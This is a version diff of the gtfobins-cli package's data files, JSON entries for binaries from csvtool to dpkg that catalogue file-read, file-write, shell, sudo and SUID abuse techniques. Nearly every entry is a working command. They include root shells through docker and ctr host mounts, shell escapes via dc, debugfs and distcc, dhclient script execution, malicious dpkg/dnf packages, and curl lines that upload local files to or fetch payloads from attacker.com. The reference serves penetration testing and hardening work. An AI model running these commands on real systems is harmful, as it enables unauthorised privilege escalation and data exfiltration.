gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/csvtool.json

@@ -3,28 +3,31 @@
     "file-read": [
       {
         "description": "The file is actually parsed and manipulated as CSV, so this might not be suitable for arbitrary data.",
-        "code": "csvtool trim t [file]\n"
+        "code": "LFILE=file_to_read\ncsvtool trim t $LFILE\n"
       }
     ],
     "file-write": [
       {
         "description": "The file is actually parsed and manipulated as CSV, so this might not be suitable for arbitrary data.",
-        "code": "TF=$(mktemp)\necho [data] > $TF\ncsvtool trim t $TF -o [file]\n"
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho DATA > $TF\ncsvtool trim t $TF -o $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./csvtool trim t [file]\n"
+        
+        "code": "LFILE=file_to_read\n./csvtool trim t $LFILE\n"
       }
     ],
     "shell": [
       {
-        "code": "csvtool call '/bin/sh;false' /etc/passwd"
+        
+        "code": "csvtool call '/bin/sh;false' /etc/passwd\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo csvtool call '/bin/sh;false' /etc/passwd"
+        
+        "code": "sudo csvtool call '/bin/sh;false' /etc/passwd\n"
       }
     ]
   }

gtfo/data/ctr.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "If ctr sudo permissions, you can use it to escape to a root shell. It is necessary to add an existing image.",
+        "code": "sudo /usr/bin/ctr run --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest bash"
+      }
+    ]
+  }
+}

gtfo/data/cupsfilter.json

@@ -2,17 +2,20 @@
   "functions": {
     "file-read": [
       {
-        "code": "cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+        
+        "code": "LFILE=file_to_read\ncupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+        
+        "code": "LFILE=file_to_read\n./cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n"
       }
     ]
   }

gtfo/data/curl.json

@@ -2,33 +2,45 @@
   "functions": {
     "file-upload": [
       {
-        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the '@' to send hard-coded data.",
-        "code": "curl -X POST -d @[file] [url]\n"
+        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.",
+        "code": "URL=http://attacker.com/\nLFILE=file_to_send\ncurl -X POST -d \"@$LFILE\" $URL\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "curl [url] -o [file]\n"
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\ncurl $URL -o $LFILE\n"
       }
     ],
     "file-read": [
       {
         "description": "The file path must be absolute.",
-        "code": "curl file://[file]\n"
+        "code": "LFILE=/tmp/file_to_read\ncurl file://$LFILE\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The file path must be absolute.",
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho DATA >$TF\ncurl \"file://$TF\" -o \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "./curl [url] -o [file]\n"
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\n./curl $URL -o $LFILE\n"
       }
     ],
     "sudo": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "sudo curl [url] -o [file]\n"
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo curl $URL -o $LFILE\n"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "Load a shared library as OpenSSL engine. Only works if curl is compiled with OpenSSL and OpenSSL has engine support enabled.",
+        "code": "curl --engine /path/to/library.so https://example.com\n"
       }
     ]
   }
-}
+}

gtfo/data/cut.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "cut -d \"\" -f1 [file]\n"
+        
+        "code": "LFILE=file_to_read\ncut -d \"\" -f1 \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./cut -d \"\" -f1 [file]\n"
+        
+        "code": "LFILE=file_to_read\n./cut -d \"\" -f1 \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo cut -d \"\" -f1 [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo cut -d \"\" -f1 \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/dash.json

@@ -2,23 +2,27 @@
   "functions": {
     "shell": [
       {
-        "code": "dash"
+        
+        "code": "dash\n"
       }
     ],
     "file-write": [
       {
-        "code": "dash -c 'echo DATA > [file]'\n"
+        
+        "code": "export LFILE=file_to_write\ndash -c 'echo DATA > $LFILE'\n"
       }
     ],
     "suid": [
       {
-        "code": "./dash -p"
+        
+        "code": "./dash -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo dash"
+        
+        "code": "sudo dash\n"
       }
     ]
   }
-}
+}

gtfo/data/date.json

@@ -1,20 +1,22 @@
 {
-  "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. This only works for the GNU variant of 'date'.",
   "functions": {
     "file-read": [
       {
-        "code": "date -f [file]\n"
+        
+        "code": "LFILE=file_to_read\ndate -f $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./date -f [file]\n"
+        
+        "code": "LFILE=file_to_read\n./date -f $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo date -f [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo date -f $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/dc.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "dc -e '!/bin/sh'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo dc -e '!/bin/sh'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./dc -e '!/bin/sh'\n"
+      }
+    ]
+  }
+}

gtfo/data/dd.json

@@ -2,23 +2,27 @@
   "functions": {
     "file-write": [
       {
-        "code": "echo \"DATA\" | dd of=[file]\n"
+        
+        "code": "LFILE=file_to_write\necho \"DATA\" | dd of=$LFILE\n"
       }
     ],
     "file-read": [
       {
-        "code": "dd if=[file]\n"
+        
+        "code": "LFILE=file_to_read\ndd if=$LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "echo \"DATA\" | ./dd of=[file]\n"
+        
+        "code": "LFILE=file_to_write\necho \"data\" | ./dd of=$LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "echo \"DATA\" | sudo dd of=[file]\n"
+        
+        "code": "LFILE=file_to_write\necho \"data\" | sudo dd of=$LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/debugfs.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "debugfs\n!/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./debugfs\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo debugfs\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/dhclient.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "The below technique utilizies `dhclient`'s script file option (`-sf`) to execute arbitrary commands with `sudo`.",
+        "code": "cat > /tmp/script.sh << EOF\n#!/bin/bash\nbash -i\nEOF\nchmod +x /tmp/script.sh\nsudo dhclient -sf /tmp/script.sh\n"
+      }
+    ]
+  }
+}

gtfo/data/dialog.json

@@ -1,20 +1,22 @@
 {
-  "description": "The file is shown in an interactive TUI dialog, thus it is not suitable for binary/too big data.",
   "functions": {
     "file-read": [
       {
-        "code": "dialog --textbox \"[file]\" 0 0\n"
+        
+        "code": "LFILE=file_to_read\ndialog --textbox \"$LFILE\" 0 0\n"
       }
     ],
     "suid": [
       {
-        "code": "./dialog --textbox \"[file]\" 0 0\n"
+        
+        "code": "LFILE=file_to_read\n./dialog --textbox \"$LFILE\" 0 0\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo dialog --textbox \"[file]\" 0 0\n"
+        
+        "code": "LFILE=file_to_read\nsudo dialog --textbox \"$LFILE\" 0 0\n"
       }
     ]
   }
-}
+}

gtfo/data/diff.json

@@ -2,18 +2,25 @@
   "functions": {
     "file-read": [
       {
-        "code": "diff --line-format=%L /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\ndiff --line-format=%L /dev/null $LFILE\n"
+      },
+      {
+        "description": "This lists the content of a directory. `$TF` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.",
+        "code": "LFOLDER=folder_to_list\nTF=$(mktemp -d)\ndiff --recursive $TF $LFOLDER\n"
       }
     ],
     "suid": [
       {
-        "code": "./diff --line-format=%L /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\n./diff --line-format=%L /dev/null $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo diff --line-format=%L /dev/null [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo diff --line-format=%L /dev/null $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/dig.json

@@ -1,19 +1,21 @@
 {
-  "description": "Each input line is treated as a lookup query for the 'dig' command and the output is corrupted with the result or errors of the operation, so this may not be suitable for binary files. Grepping for 'DiG' might help to filter out unwanted content.",
   "functions": {
     "file-read": [
       {
-        "code": "dig -f [file]\n"
+        
+        "code": "LFILE=file_to_read\ndig -f $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo dig -f [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo dig -f $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./dig -f [file]\n"
+        
+        "code": "LFILE=file_to_read\n./dig -f $LFILE\n"
       }
     ]
   }

gtfo/data/distcc.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "distcc /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./distcc /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo distcc /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/dmesg.json

@@ -3,20 +3,20 @@
     "file-read": [
       {
         "description": "This is not suitable for binary files.",
-        "code": "dmesg -rF \"[file]\"\n"
+        "code": "LFILE=file_to_read\ndmesg -rF \"$LFILE\"\n"
       }
     ],
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "dmesg -H\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo dmesg -H\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/dmidecode.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "It can be used to overwrite files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\nTF=$(mktemp)\necho \"DATA\" > $TF\n./dmiwrite $TF x.dmi\n```\n",
+        "code": "LFILE=file_to_write\nsudo dmidecode --no-sysfs -d x.dmi --dump-bin \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/dmsetup.json

@@ -2,13 +2,15 @@
   "functions": {
     "sudo": [
       {
+        
         "code": "sudo dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\nsudo dmsetup ls --exec '/bin/sh -s'\n"
       }
     ],
     "suid": [
       {
+        
         "code": "./dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\n./dmsetup ls --exec '/bin/sh -p -s'\n"
       }
     ]
   }
-}
+}

gtfo/data/dnf.json

@@ -2,9 +2,9 @@
   "functions": {
     "sudo": [
       {
-        "description": "It runs commands using a specially crafted RPM package. Generate it with https://github.com/jordansissel/fpm and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```",
-        "code": "sudo dnf install -y x-1.0-1.noarch.rpm\n"
+        "description": "It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n",
+        "code": "sudo dnf install -y x-1.0-1.noarch.rpm --disablerepo=*\n"
       }
     ]
   }
-}
+}

gtfo/data/dnsmasq.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "dnsmasq --conf-script=./script.sh\n"
+      }
+    ]
+  }
+}

gtfo/data/doas.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "suid": [
+      {
+        "description": "Spawn root shell with vi/vim.",
+        "code": "./doas -u root vi\n"
+      }
+    ]
+  }
+}

gtfo/data/docker.json

@@ -1,16 +1,15 @@
 {
-  "description": "This requires the user to be privileged enough to run docker, i.e. being in the 'docker' group or being 'root'. Any other Docker Linux image should work, e.g., 'debian'.",
   "functions": {
     "shell": [
       {
         "description": "The resulting is a root shell.",
-        "code": "docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+        "code": "docker run -v /:/mnt --rm -it alpine chroot /mnt sh\n"
       }
     ],
     "file-write": [
       {
         "description": "Write a file by copying it to a temporary container and back to the target destination on the host.",
-        "code": "CONTAINER_ID=\"$(docker run -d alpine)\" # or existing\nTF=$(mktemp)\necho \"DATA\" > $TF\ndocker cp $TF $CONTAINER_ID:$TF\ndocker cp $CONTAINER_ID:$TF [file]\n"
+        "code": "CONTAINER_ID=\"$(docker run -d alpine)\" # or existing\nTF=$(mktemp)\necho \"DATA\" > $TF\ndocker cp $TF $CONTAINER_ID:$TF\ndocker cp $CONTAINER_ID:$TF file_to_write\n"
       }
     ],
     "file-read": [
@@ -22,14 +21,18 @@
     "sudo": [
       {
         "description": "The resulting is a root shell.",
-        "code": "sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+        "code": "sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh\n"
+      },
+      {
+        "description": "Using `docker exec` with `--privileged` flag allows to mount the host filesystem, thereby obtaining unrestricted read/write access to the host.",
+        "code": "CONTAINER_ID=id_of_container\nsudo docker exec -it --privileged --user root $CONTAINER_ID bash\nmount /dev/sda1 /mnt/\n"
       }
     ],
     "suid": [
       {
         "description": "The resulting is a root shell.",
-        "code": "./docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
+        "code": "./docker run -v /:/mnt --rm -it alpine chroot /mnt sh\n"
       }
     ]
   }
-}
+}

gtfo/data/dos2unix.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        
+        "code": "LFILE1=file_to_read\nLFILE2=file_to_write\ndos2unix -f -n \"$LFILE1\" \"$LFILE2\"\n"
+      }
+    ]
+  }
+}

gtfo/data/dosbox.json

@@ -0,0 +1,32 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The file content will be displayed in the DOSBox graphical window.",
+        "code": "LFILE='\\path\\to\\file_to_read'\ndosbox -c 'mount c /' -c \"type c:$LFILE\"\n"
+      },
+      {
+        "description": "The file is copied to a readable location.",
+        "code": "LFILE='\\path\\to\\file_to_read'\ndosbox -c 'mount c /' -c \"copy c:$LFILE c:\\tmp\\output\" -c exit\ncat '/tmp/OUTPUT'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Note that the name of the written file in the following example will be `FILE_TO_`. Also note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.",
+        "code": "LFILE='\\path\\to\\file_to_write'\ndosbox -c 'mount c /' -c \"echo DATA >c:$LFILE\" -c exit\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Note that the name of the written file in the following example will be `FILE_TO_`. Also note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.",
+        "code": "LFILE='\\path\\to\\file_to_write'\n./dosbox -c 'mount c /' -c \"echo DATA >c:$LFILE\" -c exit\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Note that the name of the written file in the following example will be `FILE_TO_`. Also note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.",
+        "code": "LFILE='\\path\\to\\file_to_write'\nsudo dosbox -c 'mount c /' -c \"echo DATA >c:$LFILE\" -c exit\n"
+      }
+    ]
+  }
+}

gtfo/data/dotnet.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;\n"
+      }
+    ],
+    "file-read": [
+      {
+        
+        "code": "export LFILE=file_to_read\ndotnet fsi\nSystem.IO.File.ReadAllText(System.Environment.GetEnvironmentVariable(\"LFILE\"));;\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;\n"
+      }
+    ]
+  }
+}

gtfo/data/dpkg.json

@@ -2,19 +2,19 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "dpkg -l\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo dpkg -l\n!/bin/sh\n"
       },
       {
-        "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with https://github.com/jordansissel/fpm and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```",
-        "code": "sudo dpkg -i x_1.0_all.deb"
+        "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n",
+        "code": "sudo dpkg -i x_1.0_all.deb\n"
       }
     ]
   }
-}
+}